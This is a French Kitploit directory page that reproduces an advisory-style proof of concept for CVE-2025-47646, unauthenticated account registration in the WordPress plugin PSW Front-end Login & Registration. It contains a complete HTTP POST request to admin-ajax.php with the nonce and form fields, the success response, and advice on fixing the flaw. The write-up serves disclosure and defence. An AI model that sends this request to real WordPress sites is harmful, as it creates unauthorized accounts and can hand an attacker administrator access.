Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-47646 — Le plugin WordPress PSW Front-end Login &amp; Registration <= 1.12 est vulnérable à une authentification cassée. | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-47646
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et Éducation
GitHubnxploited/cve-2025-47646

CVE-2025-47646

Le plugin WordPress PSW Front-end Login &amp; Registration <= 1.12 est vulnérable à une authentification cassée.

Voir le dépôt
21il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔐 CVE-2025-47646 – PSW Front-end Login & Registration <= 1.12

📌 Informations sur le plugin

  • Plugin : PSW Front-end Login & Registration
  • Version vulnérable : <= 1.12
  • CVE : CVE-2025-47646
  • Sévérité : Élevée (CVSS 9.8)
  • Type de vulnérabilité : Authentification cassée
  • Privilège requis : Non authentifié
  • Corrigé : ❌ Aucun correctif officiel disponible
  • Priorité du correctif : 🔴 Élevée
  • Date de publication : 08 mai 2025

⚠️ Résumé de la vulnérabilité

Ce plugin expose une faille critique dans son mécanisme d'inscription.
Bien qu'il propose un formulaire d'inscription front-end basé sur un shortcode ([psw_registration]), il ne parvient pas à appliquer de restrictions de rôle appropriées ni de validation sécurisée.

Les attaquants peuvent exploiter ce mécanisme pour créer des comptes sans authentification — et si le default_role du site est mal configuré (par exemple, défini sur administrator), une escalade de privilèges complète peut se produire.


🧪 Preuve de concept (PoC)

✅ Point de terminaison cible :

root@kitploit:~
POST /wordpress/wp-admin/admin-ajax.php

📥 Requête (par exemple, via Burp Suite ou curl) :

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1

Host: {Host}

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 233

Origin: {Host}

Connection: keep-alive

Cookie:

Priority: u=0



first_name=nxploited&last_name=nxploited&new_user_name=nxpl3432oited&new_user_email=NxploitBot%40gmail.com&new_user_password=admin&new_user_password_confirmation=admin&action=register_user_front_end&psw_form=75a32ef38d

psw_form est le champ nonce requis pour que la requête aboutisse.
Ce nonce est généré dynamiquement à partir du shortcode [psw_registration] sur le front-end.


✅ Réponse de succès

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<h4>Hello nxploited nxploited</h4>
<p>Thanks for creating an account on our website. Please check your email for activation link...</p>

🛠️ Où se situe la faille ?

  • Le plugin autorise l'accès AJAX non authentifié à register_user_front_end
  • Il respecte le paramètre default_role de WordPress pour attribuer les rôles utilisateur
  • Si celui-ci est mal configuré (administrator), l'attaquant obtient un accès complet
  • Il n'y a aucune application de rôle codée en dur ni validation dans la logique du plugin

💬 Explication du shortcode

Pour exposer le formulaire d'inscription et générer un nonce valide pour psw_form, le shortcode suivant est utilisé :

root@kitploit:~
[psw_registration]

Celui-ci affiche un formulaire d'inscription qui inclut le champ nonce caché nécessaire pour que l'appel AJAX aboutisse.


🔐 Recommandation

  • Restreindre l'inscription AJAX non authentifiée
  • Appliquer les attributions de rôles côté serveur
  • Surveiller et verrouiller default_role sur une valeur sûre (par exemple, subscriber)
  • Appliquer un correctif virtuel si aucune mise à jour n'est disponible

⚠️ Avertissement

Ce rapport est à des fins éducatives et de tests de sécurité autorisés uniquement.
L'exploitation de cette vulnérabilité sans autorisation peut enfreindre les limites légales et éthiques.


NXploited (Khaled_Alenazi)

Télécharger l’outil